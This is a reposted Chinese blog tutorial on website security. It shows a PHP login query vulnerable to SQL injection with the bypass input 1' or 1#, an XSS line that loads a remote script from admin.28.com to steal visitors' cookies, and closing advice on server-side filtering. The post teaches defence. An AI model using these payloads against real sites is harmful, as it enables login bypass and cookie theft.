网站安全

最新推荐文章于 2024-04-29 20:30:00 发布
最新推荐文章于 2024-04-29 20:30:00 发布
阅读量60 收藏
点赞数
原文链接:http://www.cnblogs.com/hupengyin/p/4444644.html
版权

1.SQL注入:(如果是这样写的话)

$username=$_POST['username'];
$password=md5($_POST['password']);
$sql="SELECT * FROM user WHERE username='$username' AND password='$password'";

表单传来的用户名是 1' or 1#,那么放到SQL语句后,就变成了(#表示注释,把后面的注释掉了,那么这样网站就被注入了):$sql="SELECT * FROM user WHERE username='1' or 1 # AND password='$password'";

所以,一般把上面的话变成两句话:先通过username查找,然后再比较password

2.XSS(跨站脚本攻击)

用户提交表单时如果表单中包含不规则的HTML代码或者JS代码的话,会影响页面的功能以及效果。

两种形式:a.html代码

这种攻击通过输入一个不规则的HTML代码导致页面乱了。

b.js攻击

 

可以偷访问这个网站的人的COOKIE数据。

 

这个JS可以把浏览器中的COOKIE发到admin.28.com(你本地的一个文件)上去

 

首先在评论框中写入一段js:(相当于在这个网站上挂了一段js代码abc.js)

 

<script src=http://admin.28.com/abc.js></script>

 

本地Abc.js这样写:(这样就可以把访问这个网站的用户的COOKIE发到本地文件中)

 

3.那么我们应该怎样做?

  1. 一定要在服务器上过滤,不要相信客户端

b. 不能使用htmlspecialchars函数统一过滤,我们要有选择性的过滤,只过滤掉字符串中有危险字符。

需要过滤的主要是:

  1. <script>中的内容(JS)
  2. 标签上的事件,如:<div οnclick=”xxxx”>里的onclick事件等等。

我们可以自己写也可以使用网上现有的:

  1. tp框架中有一个函数:remove_xss
  2. 有一个开源产品:htmlpurifier
  3. 网上找些简单实用的

 

转载于:https://www.cnblogs.com/hupengyin/p/4444644.html

weixin_30672019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网站安全测试报告模板
吟泱
05-15 2万+
                    XXXX网站安全测试报告 摘要 经xxxxx网站负责人的授权,xxxxx有限公司安全测试小组对xxxxx网站进行了安全测试。测试结果如下: 严重问题:7个 中等问题:8个 轻度问题:6个 一.安全风险分布 详细内容如下表: 1 发现问题详细内容 问题等级 种类 数量 ...
UCloud网站安全方案
08-28
UCloud网站安全方案
PHP+MYSQL+COOKIE自动登陆3
qq_37805832的博客
04-17 326
<?php //先获取用户名是谁 $username=$_POST['username']; //获取输入的密码 $password=$_POST['password']; $autologin=(int)$_POST['autologin'];//为什么加int,因为是自动登录几天所以这样啊 //然后是知道了用户名与密码之后是链接 $link=mysqli_connect('local...
网站安全隔离-RBI技术
wangtd的博客
09-28 4589
有了远程浏览器隔离(RBI)技术之后,IT管理员可以采用更开放的互联网策略,让用户工作更便捷。即使用户访问了一些危险 Web内容,也不会影响到用户设备和企业网络。举个形象的例子,远程浏览器隔离(RBI)技术就像遥控的拆弹机器人。让机器人打开可疑包裹,即使包裹爆炸,也不会伤害到远处的真人。简言之,远程浏览器隔离(RBI)技术的价值就是——不让好的内容流出去,不让坏的内容流进来。
网站安全扫描工具,举荐6个网站安全扫描工具
weixin_43534496的博客
11-15 3014
好的网站安全扫描工具可以把我们网站安全问题提前扫描出来,好做修复。同时也避免了黑客对我们网站的攻击。那么有哪些好的网站安全扫描工具呢?
网站安全检测:推荐 8 款免费的 Web 安全测试工具
白帽子佳奇的博客
04-29 3998
网站安全是确保数据保护和系统完整性的重要组成部分。对于希望增强网站安全性的开发者和管理员来说,利用有效的工具进行定期的安全测试是必不可少的。
网站安全建设
ifwinds的博客
08-14 1万+
伴随着web技术的发展, 针对官网安全建设的几点思考 1、为保证数据传输过程的安全性,建议重要数据使用https链接,密码等极重要数据增加RSA等非对称加密算法加密传输。 2、建议会员注册和修改密码等功能增加传输过程的完整性校验。 3、后台管理系统使用不容易被猜到的url(当前系统的url为:网站地址/admin,很容易被猜到)。 4、后台管理系统分配不同的角色,并交由专人维护。 5、...
网站安全防护该怎么做?有什么具体措施?
desheng991124的博客
04-24 4096
网站安全已经是SEO优化中非常重要的一环,一旦网站被黑客入侵,就可能导致网站打不开、访问速度变慢、被挂黑链等问题,而这些问题一出现就有可能被搜索引擎拉入黑名单,导致网站被K,作为SEOer掌握最基础的网站安全防范知识是很有必要的,其主要分为两个部分:域名安全网站安全。 我们在云服务厂商处购买类似web应用安全防火墙的产品。对于网站系统自身的安全也要做好防范,对于网站后台的登录地址尽量的避免暴露或者采取限制IP登录。以阿里云为例,我们可以在云防护平台控制台看见服务器的安全问题,也可以自行检测,还能看见服务
计算机老提示安全证书到期,安全证书过期,教您怎么解决网站安全证书过期
weixin_33758343的博客
07-21 2万+
或许有很多小伙伴们会想要知道出现网站安全证书过期的原因是什么。其实造成这个的原因有很多,例如当前时间和电脑时间不一致、电脑安装的根源证书时效了等。那么要如何解决呢?小编有解决方法哟~~小伙伴们快跟上脚步和我一起来看看解决网站安全证书过期的方法~~有的时候当我们打开网页的时候会出现网站安全证书过期的提示,那么当我们遇到网站安全证书过期的时候该怎么办呢?有问题,找小编~接下来小编我就告诉你们怎么解决网...
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 17万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网站安全手册
03-23
关于网站安全方面的介绍隐藏在世界各地的攻击者通常可以利用网站所有可能的错误,包括设计错误、安装配置错误等,向网络发起攻击。系统软件存在的漏洞是最大隐患,因为攻击者只要找到某一种系统软件的安全漏洞,那么...
网站安全傻瓜版
12-23
### 知识点一:网站安全解决方案 #### 1.1 网站安全的重要性 - **背景介绍**:随着互联网技术的发展,越来越多的企业和个人将业务转移到线上,这使得网站成为了企业和个人与用户交流的重要平台。然而,网络安全威胁...
网站安全管理
08-31
网站安全管理
B2C.rar_网站安全
09-23
简单b2c电子商务网站带后台。 本实例实现的主要功能如下: 要求系统具有良好的人机界面。 如果系统的使用对象较多,则要求有较好的权限管理。 全面展示系统内所有商品。...网站运行稳定、安全可靠。
网站安全漏洞--大全
IT利刃出鞘的博客
05-23 9291
本文介绍网站常见的一些安全漏洞。
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT).zip
最新发布
08-10
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT)
网站安全开发关键实践
网站安全开发手册是一份针对网站系统开发人员的重要参考资料,旨在帮助开发者理解和实施安全的开发实践。这份手册详细阐述了多个关键的安全领域,包括输入验证、输出编码、防止SQL注入、跨站脚本攻击(XSS)防御、跨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值